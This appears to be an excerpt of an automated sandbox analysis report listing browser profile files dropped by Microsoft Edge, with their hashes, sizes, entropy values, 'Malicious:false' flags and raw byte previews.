                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378326091247658

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2285
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.466144174246087
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:3ARYbcARQOpKo+O5yo+OUjs40s4ARd9U:3AR3ULZVSs40s4Ud9
                                                                                                                                                                                                                                                                                  MD5:9F3D4BBB3C2CFB5B62FDE04A4F8F7A1B
                                                                                                                                                                                                                                                                                  SHA1:B8E018E4E551641906FB51ED95DB6B32002A306A
                                                                                                                                                                                                                                                                                  SHA-256:69296E15F13B8CA42A23A2EF1F47B1C9A2CD6AA7A82B5775F0C3A451C90251BD
                                                                                                                                                                                                                                                                                  SHA-512:9957A249FC487F553FFEEEA4AC2176C4987D25ABCE4661CA031A9B8C6D6A488ED8CC4EBA93D408093E82956E518D9B62E8DD27B1EE0D797E3C6F1FFF15493706
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SNSS.......?..............?........."?..............?..........?..........@..........@.......!..@..................................?...@...1..,...@...$...4ddc2bc5_c4b2_4d11_a358_c21a3d91bd85...?..........@.......aq{........?......?.......................5..0...?...&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.....?.............A..........A.......!..A..................................?...A...1..,...A...$...52d26e06_6802_4864_9f6d_9e59dfd60e53...?..........A.......-.L........A..............A.......8...file:///C:/Users/user/AppData/Local/Temp/1027599800.pdf............!........................................................................................................n...(...n...(..@.......X.......................................................................x...8...f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.0.2.7.5.9.9.8.0.0...p.d.f.................................8.......0.......8.............................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.123510798665569
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7iBt+q2Pwkn23oH+Tcwt7Uh2ghZIFUt8OiJE5Zmw+OiJEtVkwOwkn23oH+Tcwt7w:7BvYfYebIhHh2FUt8OWQ/+OWY5JfYebs
                                                                                                                                                                                                                                                                                  MD5:A370ED615801429C6A34951531E37679
                                                                                                                                                                                                                                                                                  SHA1:928FDA1AE6BD54DA35C0C14587C7D5C7E8E6BEF8
                                                                                                                                                                                                                                                                                  SHA-256:05731D88BBDF9241EDFF33AE2EC19AB1D810208A2EF52F21E549E8C6A110A606
                                                                                                                                                                                                                                                                                  SHA-512:2A3723FABE824545BB168FC5BC83A65551953F1D82C714CD6844FF44FF52FD13A0E2E051FAC22F6EB6CAB8F0CC7CE5A75B0CC341B4EDDDB34C9E44C2FE1A4B40
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1ea8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:41:28.699 1ea8 Recovering log #3.2024/12/10-12:41:28.699 1ea8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.123510798665569
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7iBt+q2Pwkn23oH+Tcwt7Uh2ghZIFUt8OiJE5Zmw+OiJEtVkwOwkn23oH+Tcwt7w:7BvYfYebIhHh2FUt8OWQ/+OWY5JfYebs
                                                                                                                                                                                                                                                                                  MD5:A370ED615801429C6A34951531E37679
                                                                                                                                                                                                                                                                                  SHA1:928FDA1AE6BD54DA35C0C14587C7D5C7E8E6BEF8
                                                                                                                                                                                                                                                                                  SHA-256:05731D88BBDF9241EDFF33AE2EC19AB1D810208A2EF52F21E549E8C6A110A606
                                                                                                                                                                                                                                                                                  SHA-512:2A3723FABE824545BB168FC5BC83A65551953F1D82C714CD6844FF44FF52FD13A0E2E051FAC22F6EB6CAB8F0CC7CE5A75B0CC341B4EDDDB34C9E44C2FE1A4B40
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1ea8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:41:28.699 1ea8 Recovering log #3.2024/12/10-12:41:28.699 1ea8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsulLn0alll:Ls+rlll
                                                                                                                                                                                                                                                                                  MD5:E825BC86D66D65C785F7B5A7154D3B7A
                                                                                                                                                                                                                                                                                  SHA1:6CF63AD7C26D24CA8FF2517C559F60EF0EE898A4
                                                                                                                                                                                                                                                                                  SHA-256:5A083BFE30C3D57A96F481864BC8F4C3C1DDEBBD42988729AF885B82B858AFFE
                                                                                                                                                                                                                                                                                  SHA-512:A22BF870FDD48A046384D0511FA1447AA129DA501320624D2259A8E31F34DB503DA88DB51A4AE7CD810AECC80AE5CA887C1FC6EDD2B4CFF17F098195EBC59619
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.........................................g.F../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNltiull:Ls3Qull
                                                                                                                                                                                                                                                                                  MD5:5BD064DE8E69BD13E9EAEECE94543CF8
                                                                                                                                                                                                                                                                                  SHA1:9D053DCF97BD429171776AE4BFA205D28208C8CB
                                                                                                                                                                                                                                                                                  SHA-256:8C216DBB49897B78BC94557E631168BDD501354E3E950EAEE05419BE3B2A8E48
                                                                                                                                                                                                                                                                                  SHA-512:5CCC2EB6A973665C9EE4B979556D39AC56BA343F3A4667234B347F3F3E3EEC4BD946E5F1908C60B4047332E076903A50C4645C713E9463F2A976351A64B9BE5A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................>:FF../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.230250648128074
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:73gN+vYfYebvqBQFUt8O3Z/+O3dPNV5JfYebvqBvJ:73g6YfYebvZg8O3N3dNJfYebvk
                                                                                                                                                                                                                                                                                  MD5:89A6C314385948B082887627EA4C8BA6
                                                                                                                                                                                                                                                                                  SHA1:8785A922AFF3E12DE4426F5C23F974BB911870FF
                                                                                                                                                                                                                                                                                  SHA-256:2667901559DF3523D05671CE7E98969973B373BD7F68AED90BD0BA98C4E1FDC1
                                                                                                                                                                                                                                                                                  SHA-512:FE4B8194AA3D106BEA92F987305E372AC2296EFA30F5C1EE9EA34061B686A1FFFF46442CF2314DC6D4FE50CAB1B296A9EFD93861C1CF28824959C7B9AF054819
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.743 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.744 1f7c Recovering log #3.2024/12/10-12:41:29.751 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.230250648128074
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:73gN+vYfYebvqBQFUt8O3Z/+O3dPNV5JfYebvqBvJ:73g6YfYebvZg8O3N3dNJfYebvk
                                                                                                                                                                                                                                                                                  MD5:89A6C314385948B082887627EA4C8BA6
                                                                                                                                                                                                                                                                                  SHA1:8785A922AFF3E12DE4426F5C23F974BB911870FF
                                                                                                                                                                                                                                                                                  SHA-256:2667901559DF3523D05671CE7E98969973B373BD7F68AED90BD0BA98C4E1FDC1
                                                                                                                                                                                                                                                                                  SHA-512:FE4B8194AA3D106BEA92F987305E372AC2296EFA30F5C1EE9EA34061B686A1FFFF46442CF2314DC6D4FE50CAB1B296A9EFD93861C1CF28824959C7B9AF054819
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.743 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.744 1f7c Recovering log #3.2024/12/10-12:41:29.751 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0c7ac0a5-3b6b-475a-96a3-6c8d6cf2a78b.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\989f7921-87f7-4fdb-b59c-c61c53fd3ae1.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
